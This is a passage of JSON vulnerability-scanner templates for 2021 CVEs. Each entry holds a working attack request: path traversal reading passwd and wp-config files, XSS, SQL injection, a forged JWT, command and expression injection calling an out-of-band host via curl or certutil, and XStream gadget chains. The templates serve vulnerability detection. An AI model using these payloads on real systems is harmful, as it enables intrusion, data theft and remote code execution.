Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-28164","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43798","info":{"name":"Grafana v8.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd","{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini","{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:([0-9]+):","\\/tmp\\/grafana\\.sock","\\[(fonts|extensions|Mail|files)\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22053","info":{"name":"Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/","{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"regex","part":"interactsh_request","regex":["curl|CertUtil"]}]}]},{"id":"CVE-2021-37580","info":{"name":"Apache ShenYu Admin JWT - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dashboardUser HTTP/1.1\nHost: {{Hostname}}\nX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["query success","\"userName\":\"admin\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24351","info":{"name":"WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","the-plus-addons-for-elementor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25075","info":{"name":"WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\naction=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n","GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["style=animation-name:rotation onanimationstart=alert(/XSS/) p","toplevel_page_wpda_duplicate_post_menu"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25281","info":{"name":"SaltStack Salt <3002.5 - Auth Bypass","severity":"critical"},"requests":[{"raw":["POST /run HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["return","tag","jid","salt","wheel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28377","info":{"name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32853","info":{"name":"Erxes <0.23.0 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["topic_id: \"</script><script>alert(document.domain)</script>","window.erxesEnv"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29442","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46422","info":{"name":"SDT-CW3B1 1.1.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>"]},{"type":"word","name":"http","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2021-26295","info":{"name":"Apache OFBiz <17.12.06 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n<soapenv:Envelope\n  xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ns1:clearAllEntityCaches xmlns:ns1=\"http://ofbiz.apache.org/service/\">\n          <ns1:cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</ns1:cus-obj>\n      </ns1:clearAllEntityCaches>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["errorMessage"],"condition":"and"},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce&param=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42565","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35380","info":{"name":"TermTalk Server 3.24.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file?valore=../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-40149","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/self.key"],"matchers-condition":"and","matchers":[{"type":"word","words":["-----BEGIN RSA PRIVATE KEY-----","-----END RSA PRIVATE KEY----"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21881","info":{"name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic dXNlcjp1c2Vy\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46UEFTUw==\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-24746","info":{"name":"WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts","{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["?a\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"slug","group":1,"regex":["\"slug\":\"([_a-z-A-Z0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27124","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /patient/search_result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nexpertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","Doctor Appoinment System"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22707","info":{"name":"EVlink City < R8 V3.4.0.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin\n"],"host-redirects":true,"max-redirects":2,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["?worker=Cluster\" name=\"cluster\" id=\"id_cluster"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21800","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>SSH Session </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25063","info":{"name":"WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>' type='hidden"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21479","info":{"name":"SCIMono <0.0.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"],"matchers":[{"type":"word","part":"body","words":["The attribute value","java.lang.UNIXProcess@","has invalid value!","\"status\" : \"400\""],"condition":"and"}]}]},{"id":"CVE-2021-24320","info":{"name":"WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27748","info":{"name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/docpicker/internal_proxy/http/oast.me","{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me"],"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25008","info":{"name":"The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","Snippets"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41826","info":{"name":"PlaceOS 1.2109.1 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/logout?continue=//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301],"condition":"or"}]}]},{"id":"CVE-2021-24875","info":{"name":"WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"eCommerce Product Catalog\")"],"condition":"and"}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16  - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n          <packet>\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\n                      <uriProperties/>\n                      <attributeProperties/>\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\n                        <getter>\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\n                          <name>verify</name>\n                          <parameter-types/>\n                        </getter>\n                      </inheritedAttWildcard>\n                    </bi>\n                    <tagName/>\n                    <context>\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\n                        <outer-class reference='../..'/>\n                      </marshallerPool>\n                      <nameList>\n                        <nsUriCannotBeDefaulted>\n                          <boolean>true</boolean>\n                        </nsUriCannotBeDefaulted>\n                        <namespaceURIs>\n                          <string>1</string>\n                        </namespaceURIs>\n                        <localNames>\n                          <string>UTF-8</string>\n                        </localNames>\n                      </nameList>\n                    </context>\n                  </bridge>\n                </bridge>\n                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>\n                  <activationCmd>curl http://{{interactsh-url}}</activationCmd>\n                </jaxbObject>\n              </dataSource>\n            </message>\n            <satellites/>\n            <invocationProperties/>\n          </packet>\n        </indexMap>\n      </comparator>\n    </default>\n    <int>3</int>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-24510","info":{"name":"WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"></script><script>alert(document.domain)</script><\" HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43778","info":{"name":"GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29505","info":{"name":"XStream <1.4.17 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>{{interactsh-url}}</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>{{interactsh-url}}</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46071","info":{"name":"ehicle Service Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_category HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1\n","GET /admin/?page=maintenance/category HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-35464","info":{"name":"ForgeRock OpenAM <7.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/oauth2/..;/ccversion/Version"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Set-Cookie: JSESSIONID="]},{"type":"word","part":"body","words":["Version Information -","openam/ccversion/Masthead.jsp"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45043","info":{"name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /language/lang HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24370","info":{"name":"WordPress Fancy Product Designer <4.6.9  - Arbitrary File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"error\":\"You need to define a directory"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39312","info":{"name":"WordPress True Ranker <2.2.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nsrc=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20123","info":{"name":"Draytek VigorConnect 1.6.0-B - Local File 